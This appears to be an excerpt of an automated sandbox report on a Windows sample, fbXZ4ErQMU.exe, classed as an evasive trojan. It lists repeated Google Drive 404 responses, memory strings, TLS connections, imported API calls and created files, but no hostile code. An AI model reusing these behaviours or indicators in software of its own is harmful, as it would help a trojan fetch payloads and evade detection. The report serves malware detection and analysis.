      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 05 Dec 2024 16:03:58 GMTContent-Security-Policy: script-src 'nonce-icaGCId8_gFuSdVpjuZkXg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652X-GUploader-UploadID: AFiumC406yfPXNi0hDG2XfAmUFRhutX9VZPbMO3v_cKFkQUtD3MR5NZuswmQBbI95Yt3njF0DN8rBMljTgServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 05 Dec 2024 16:04:09 GMTContent-Security-Policy: script-src 'nonce-Bc_2vepgCjqMuBTIqRBnpw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652X-GUploader-UploadID: AFiumC4eVvjuM7JnlEacZhEo5fECOFN3i6ig_GkQRtxdJhXATneCuct0yPQ3qOY9tIV5Q2ehUt9ELSoS9wServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 05 Dec 2024 16:04:20 GMTContent-Security-Policy: script-src 'nonce-dzfoslekdVLnTmyg9QmvDQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652X-GUploader-UploadID: AFiumC4o1auPodTVc1U8tdZnCmRNEnV4MrVkQZ-F6ewcygyrvkIfkGIwvDZQiE7yr88u0yt91Hh1_GAAGAServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 05 Dec 2024 16:04:31 GMTContent-Security-Policy: script-src 'nonce-PalheP376nsrsJ1wdhzABQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652X-GUploader-UploadID: AFiumC5wr8Hr-ERYLSKXTQ39aHOvNGQ0UBQg06ByK_MSl9LnSPk7ejRANmOmy9cNXK0zp6kBJ0pgLdl_EAServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 05 Dec 2024 16:04:42 GMTContent-Security-Policy: script-src 'nonce-dBEiWtpriMk1vP6-CSsLsg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652X-GUploader-UploadID: AFiumC5djuB6u451xkPbseAL2Fw74gu2-sYdnhC3ouDL0RL73a4EhlUSBQc4f1IESZpCPmNqgEciUnQ0ngServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 05 Dec 2024 16:04:54 GMTContent-Security-Policy: script-src 'nonce-ZWCLr7XKLGW4va_yB5twHA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652X-GUploader-UploadID: AFiumC5Z-QIukitg_Etj8K5EQRQqD8Py4uWAIGJ7iazhkSELJ7OndcfAmYvMrF6O2vOSc8wYf16Lg0XpqgServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 05 Dec 2024 16:05:05 GMTContent-Security-Policy: script-src 'nonce-mXI6D9fuzwTjOamT_f25Mw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652X-GUploader-UploadID: AFiumC5ha9xwpAGxrF9AObB47bH3WAIOg5Dd4kjUqHgAI8dpB3bPp8hJh8_xpLuWp-VySRfzavYgkXhgxgServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 05 Dec 2024 16:05:16 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-7USCs70f41WRI35N-mWk4g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652X-GUploader-UploadID: AFiumC6qHkYESejmC0ulNAWyaT_t8XcQjCkB0xlVhRyBRpRN0R5KmXQ1crZPTUsJ3Heuv9hamgServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 05 Dec 2024 16:05:27 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-1_3vcwjgMho-ygVstGkFxw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652X-GUploader-UploadID: AFiumC52Tl_ttFYP4gDCv83-FtwoQuinsDNQ3GdMzGFJXtSxcBWC159WHpfjYuwadzqPbCQwmc4QFe5gPAServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
00000003.00000003.52719203506.0000000006F09000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52839942849.0000000006F09000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53618132021.0000000006EA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
      Source: fbXZ4ErQMU.exe, 00000003.00000003.52952093836.0000000006EB7000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52945627446.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53506009888.0000000006E5B000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52833039147.0000000006F09000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53176252546.0000000006E5C000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52719203506.0000000006F09000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52839942849.0000000006F09000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53618132021.0000000006EA5000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000002.56511591295.0000000006E7A000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000002.56511638576.0000000006E99000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53058091433.0000000006E90000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52839760041.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52945802613.0000000006F09000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53400172887.0000000006E5C000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53170207947.0000000006E5B000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53730137731.0000000006E5B000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52719057837.0000000006F09000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52839942849.0000000006EB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
      Source: fbXZ4ErQMU.exe, 00000003.00000003.53282275495.0000000006E5B000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53618375979.0000000006E5B000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52951879609.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53058380581.0000000006E5B000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53058091433.0000000006EAC000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52945802613.0000000006EB8000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.54066069249.0000000006E99000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52726610810.0000000006F09000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53624432299.0000000006E5C000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52832764653.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53057962046.0000000006EB9000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.54513141564.0000000006E99000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53394052068.0000000006E5B000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52952093836.0000000006EB7000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52945627446.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53506009888.0000000006E5B000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52833039147.0000000006F09000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53176252546.0000000006E5C000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 
00000003.00000003.52719203506.0000000006F09000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52839942849.0000000006F09000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53618132021.0000000006EA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
      Source: fbXZ4ErQMU.exe, 00000003.00000003.53282275495.0000000006E5B000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53618375979.0000000006E5B000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52951879609.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53058380581.0000000006E5B000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53058091433.0000000006EAC000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52945802613.0000000006EB8000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.54066069249.0000000006E99000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52726610810.0000000006F09000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53624432299.0000000006E5C000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52832764653.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53057962046.0000000006EB9000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.54513141564.0000000006E99000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53394052068.0000000006E5B000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52952093836.0000000006EB7000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52945627446.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53506009888.0000000006E5B000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52833039147.0000000006F09000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53176252546.0000000006E5C000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 
00000003.00000003.52719203506.0000000006F09000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52839942849.0000000006F09000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53618132021.0000000006EA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
      Source: unknown HTTPS traffic detected: 142.250.217.238:443 -> 192.168.11.20:49751 version: TLS 1.2
      Source: unknown HTTPS traffic detected: 142.250.64.193:443 -> 192.168.11.20:49752 version: TLS 1.2
      Source: unknown HTTPS traffic detected: 142.250.64.193:443 -> 192.168.11.20:49756 version: TLS 1.2
      Source: unknown HTTPS traffic detected: 142.250.217.238:443 -> 192.168.11.20:49765 version: TLS 1.2
      Source: unknown HTTPS traffic detected: 142.250.217.238:443 -> 192.168.11.20:49767 version: TLS 1.2
      Source: unknown HTTPS traffic detected: 142.250.64.193:443 -> 192.168.11.20:49770 version: TLS 1.2
      Source: unknown HTTPS traffic detected: 142.250.217.238:443 -> 192.168.11.20:49775 version: TLS 1.2
      Source: unknown HTTPS traffic detected: 142.250.64.193:443 -> 192.168.11.20:49776 version: TLS 1.2
      Source: unknown HTTPS traffic detected: 142.250.217.238:443 -> 192.168.11.20:49783 version: TLS 1.2
      Source: unknown HTTPS traffic detected: 142.250.64.193:443 -> 192.168.11.20:49792 version: TLS 1.2
      Source: unknown HTTPS traffic detected: 142.250.64.193:443 -> 192.168.11.20:49798 version: TLS 1.2
      Source: unknown HTTPS traffic detected: 142.250.64.193:443 -> 192.168.11.20:49802 version: TLS 1.2
      Source: unknown HTTPS traffic detected: 142.250.64.193:443 -> 192.168.11.20:49808 version: TLS 1.2
      Source: unknown HTTPS traffic detected: 142.250.217.238:443 -> 192.168.11.20:49811 version: TLS 1.2
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exe Code function: 0_2_0040535C GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040535C
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exe Code function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403348
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exe File created: C:\Windows\resources\0409
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exe File created: C:\Windows\Arder.lnk
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exe Code function: 0_2_00406945 0_2_00406945
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exe Code function: 0_2_0040711C 0_2_0040711C
      Source: C:\Users\user\Desktop\fbXZ4ErQMU.exe Code function: 0_2_70051A98 0_2_70051A98
      Source: fbXZ4ErQMU.exe Static PE information: invalid certificate
      Source: fbXZ4ErQMU.exe, 00000000.00000000.51418181320.0000000000458000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameuganderens.exeDVarFileInfo$ vs fbXZ4ErQMU.exe
      Source: fbXZ4ErQMU.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: classification engine Classification label: mal68.troj.evad.winEXE@3/8@2/2
